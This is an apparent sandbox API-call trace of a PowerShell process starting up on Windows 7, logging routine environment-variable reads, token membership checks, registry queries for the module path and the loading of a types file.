	[0703.679] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x24dd40 | out: lpFileInformation=0x24dd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0703.679] SetErrorMode (uMode=0x1) returned 0x1
	[0716.445] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0716.445] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0716.445] CoTaskMemFree (pv=0x51cf00) 
	[0716.446] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0716.446] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0716.447] CoTaskMemFree (pv=0x51cf00) 
	[0716.447] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0716.447] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0716.447] CoTaskMemFree (pv=0x51cf00) 
	[0718.494] CoCreateGuid (in: pguid=0x24e108 | out: pguid=0x24e108*(Data1=0x8ab6069a, Data2=0xa896, Data3=0x4f24, Data4=([0]=0xbf, [1]=0xa8, [2]=0xf, [3]=0x13, [4]=0xfc, [5]=0xa7, [6]=0x64, [7]=0x5c))) returned 0x0
	[0718.497] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0718.497] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0718.497] CoTaskMemFree (pv=0x51cf00) 
	[0718.500] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0718.500] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0718.500] CoTaskMemFree (pv=0x51cf00) 
	[0718.503] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0718.503] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0718.503] CoTaskMemFree (pv=0x51cf00) 
	[0718.521] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0718.523] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x24ddb0 | out: lpConsoleScreenBufferInfo=0x24ddb0) returned 1
	[0718.543] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0720.288] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x24ddb0 | out: lpConsoleScreenBufferInfo=0x24ddb0) returned 1
	[0720.289] GetVersionExW (in: lpVersionInformation=0x24dd40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24dd40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0720.292] GetCurrentProcess () returned 0xffffffffffffffff
	[0720.293] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x24ddd8 | out: TokenHandle=0x24ddd8*=0x2f0) returned 1
	[0720.297] GetTokenInformation (in: TokenHandle=0x2f0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24dcf8 | out: TokenInformation=0x0, ReturnLength=0x24dcf8) returned 0
	[0720.298] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4872e0
	[0720.298] GetTokenInformation (in: TokenHandle=0x2f0, TokenInformationClass=0x8, TokenInformation=0x4872e0, TokenInformationLength=0x4, ReturnLength=0x24dcf8 | out: TokenInformation=0x4872e0, ReturnLength=0x24dcf8) returned 1
	[0720.300] DuplicateTokenEx (in: hExistingToken=0x2f0, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x24de58 | out: phNewToken=0x24de58*=0x2ec) returned 1
	[0720.300] GetTokenInformation (in: TokenHandle=0x2f0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24dcf8 | out: TokenInformation=0x0, ReturnLength=0x24dcf8) returned 0
	[0720.300] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4872c0
	[0720.300] GetTokenInformation (in: TokenHandle=0x2f0, TokenInformationClass=0x8, TokenInformation=0x4872c0, TokenInformationLength=0x4, ReturnLength=0x24dcf8 | out: TokenInformation=0x4872c0, ReturnLength=0x24dcf8) returned 1
	[0720.301] CheckTokenMembership (in: TokenHandle=0x2ec, SidToCheck=0x2b505b0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x24de68 | out: IsMember=0x24de68) returned 1
	[0720.301] CloseHandle (hObject=0x2ec) returned 1
	[0720.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0720.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0720.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0720.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0721.762] CoTaskMemAlloc (cb=0x804) returned 0x1b8f2210
	[0721.762] GetConsoleTitleW (in: lpConsoleTitle=0x1b8f2210, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0721.762] CoTaskMemFree (pv=0x1b8f2210) 
	[0721.777] CoTaskMemAlloc (cb=0x804) returned 0x1b8f2ac0
	[0721.777] GetConsoleTitleW (in: lpConsoleTitle=0x1b8f2ac0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0721.777] CoTaskMemFree (pv=0x1b8f2ac0) 
	[0721.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0721.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0721.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0721.780] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0721.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0721.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0721.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0721.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0725.078] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x308
	[0725.080] CoCreateGuid (in: pguid=0x24df50 | out: pguid=0x24df50*(Data1=0x4951a719, Data2=0x13fd, Data3=0x4ac4, Data4=([0]=0xbc, [1]=0x27, [2]=0x32, [3]=0xa, [4]=0xc7, [5]=0xb3, [6]=0xee, [7]=0x50))) returned 0x0
	[0725.081] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0725.081] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0725.082] CoTaskMemFree (pv=0x51cf00) 
	[0725.089] WinSqmIsOptedIn () returned 0x0
	[0726.626] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0726.626] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.626] CoTaskMemFree (pv=0x51cf00) 
	[0726.631] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0726.631] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.632] CoTaskMemFree (pv=0x51cf00) 
	[0726.633] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0726.633] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.633] CoTaskMemFree (pv=0x51cf00) 
	[0726.636] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0726.636] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.636] CoTaskMemFree (pv=0x51cf00) 
	[0726.641] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0726.641] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.641] CoTaskMemFree (pv=0x51cf00) 
	[0726.650] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0726.650] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.650] CoTaskMemFree (pv=0x51cf00) 
	[0726.651] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0726.651] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.651] CoTaskMemFree (pv=0x51cf00) 
	[0726.651] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0726.651] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.652] CoTaskMemFree (pv=0x51cf00) 
	[0726.654] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0726.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.654] CoTaskMemFree (pv=0x51cf00) 
	[0726.658] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0726.659] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.659] CoTaskMemFree (pv=0x51cf00) 
	[0728.266] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0728.266] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0728.271] CoTaskMemFree (pv=0x51cf00) 
	[0728.271] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0728.271] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0728.271] CoTaskMemFree (pv=0x51cf00) 
	[0734.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0734.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0734.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0734.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0736.340] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0736.340] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0736.341] CoTaskMemFree (pv=0x51cf00) 
	[0736.341] CoTaskMemAlloc (cb=0xcc) returned 0x4e51c0
	[0736.341] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x4e51c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0736.341] CoTaskMemFree (pv=0x4e51c0) 
	[0736.342] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x24dac8 | out: phkResult=0x24dac8*=0x30c) returned 0x0
	[0736.342] RegQueryValueExW (in: hKey=0x30c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24da4c, lpData=0x0, lpcbData=0x24da48*=0x0 | out: lpType=0x24da4c*=0x2, lpData=0x0, lpcbData=0x24da48*=0x6c) returned 0x0
	[0736.342] CoTaskMemAlloc (cb=0x70) returned 0x4c0240
	[0736.342] RegQueryValueExW (in: hKey=0x30c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24da1c, lpData=0x4c0240, lpcbData=0x24da18*=0x6c | out: lpType=0x24da1c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x24da18*=0x6c) returned 0x0
	[0736.342] CoTaskMemFree (pv=0x4c0240) 
	[0736.342] CoTaskMemAlloc (cb=0xcc) returned 0x4e51c0
	[0736.342] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x4e51c0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0736.342] CoTaskMemFree (pv=0x4e51c0) 
	[0736.342] CoTaskMemAlloc (cb=0xcc) returned 0x4e51c0
	[0736.342] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x4e51c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0736.342] CoTaskMemFree (pv=0x4e51c0) 
	[0736.346] RegCloseKey (hKey=0x30c) returned 0x0
	[0736.346] CoTaskMemAlloc (cb=0xcc) returned 0x4e51c0
	[0736.346] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x4e51c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0736.346] CoTaskMemFree (pv=0x4e51c0) 
	[0736.346] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x24dac8 | out: phkResult=0x24dac8*=0x30c) returned 0x0
	[0736.347] RegQueryValueExW (in: hKey=0x30c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24da4c, lpData=0x0, lpcbData=0x24da48*=0x0 | out: lpType=0x24da4c*=0x0, lpData=0x0, lpcbData=0x24da48*=0x0) returned 0x2
	[0736.347] RegCloseKey (hKey=0x30c) returned 0x0
	[0736.352] CoTaskMemAlloc (cb=0x20c) returned 0x51ab40
	[0736.353] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x51ab40 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0737.807] CoTaskMemFree (pv=0x51ab40) 
	[0737.807] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x24d650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0737.808] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0737.819] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0737.820] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0737.820] CoTaskMemFree (pv=0x51cf00) 
	[0737.826] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0737.826] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0737.826] CoTaskMemFree (pv=0x51cf00) 
	[0737.835] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0737.835] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0737.835] CoTaskMemFree (pv=0x51cf00) 
	[0737.835] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0737.835] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0737.835] CoTaskMemFree (pv=0x51cf00) 
	[0737.837] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d8b8 | out: phkResult=0x24d8b8*=0x314) returned 0x0
	[0737.838] RegQueryValueExW (in: hKey=0x314, lpValueName="path", lpReserved=0x0, lpType=0x24d8cc, lpData=0x0, lpcbData=0x24d8c8*=0x0 | out: lpType=0x24d8cc*=0x1, lpData=0x0, lpcbData=0x24d8c8*=0x74) returned 0x0
	[0737.839] RegQueryValueExW (in: hKey=0x314, lpValueName="path", lpReserved=0x0, lpType=0x24d83c, lpData=0x0, lpcbData=0x24d838*=0x0 | out: lpType=0x24d83c*=0x1, lpData=0x0, lpcbData=0x24d838*=0x74) returned 0x0
	[0737.839] CoTaskMemAlloc (cb=0x78) returned 0x4c0240
	[0737.839] RegQueryValueExW (in: hKey=0x314, lpValueName="path", lpReserved=0x0, lpType=0x24d80c, lpData=0x4c0240, lpcbData=0x24d808*=0x74 | out: lpType=0x24d80c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x24d808*=0x74) returned 0x0
	[0737.839] CoTaskMemFree (pv=0x4c0240) 
	[0737.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x24d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0737.839] SetErrorMode (uMode=0x1) returned 0x1
	[0737.839] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x24d790 | out: lpFileInformation=0x24d790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0737.839] SetErrorMode (uMode=0x1) returned 0x1
	[0739.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0739.382] SetErrorMode (uMode=0x1) returned 0x1
	[0739.382] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d790 | out: lpFileInformation=0x24d790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0739.382] SetErrorMode (uMode=0x1) returned 0x1
	[0739.384] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0739.384] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0739.384] CoTaskMemFree (pv=0x51cf00) 
	[0739.385] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0739.385] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0739.385] CoTaskMemFree (pv=0x51cf00) 
	[0739.386] GetACP () returned 0x4e4
	[0739.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0739.396] SetErrorMode (uMode=0x1) returned 0x1
	[0739.399] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0739.400] GetFileType (hFile=0x318) returned 0x1
	[0739.400] SetErrorMode (uMode=0x1) returned 0x1
	[0739.400] GetFileType (hFile=0x318) returned 0x1
	[0739.404] ReadFile (in: hFile=0x318, lpBuffer=0x2bdcaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2bdcaa0*, lpNumberOfBytesRead=0x24d6c8*=0x1000, lpOverlapped=0x0) returned 1
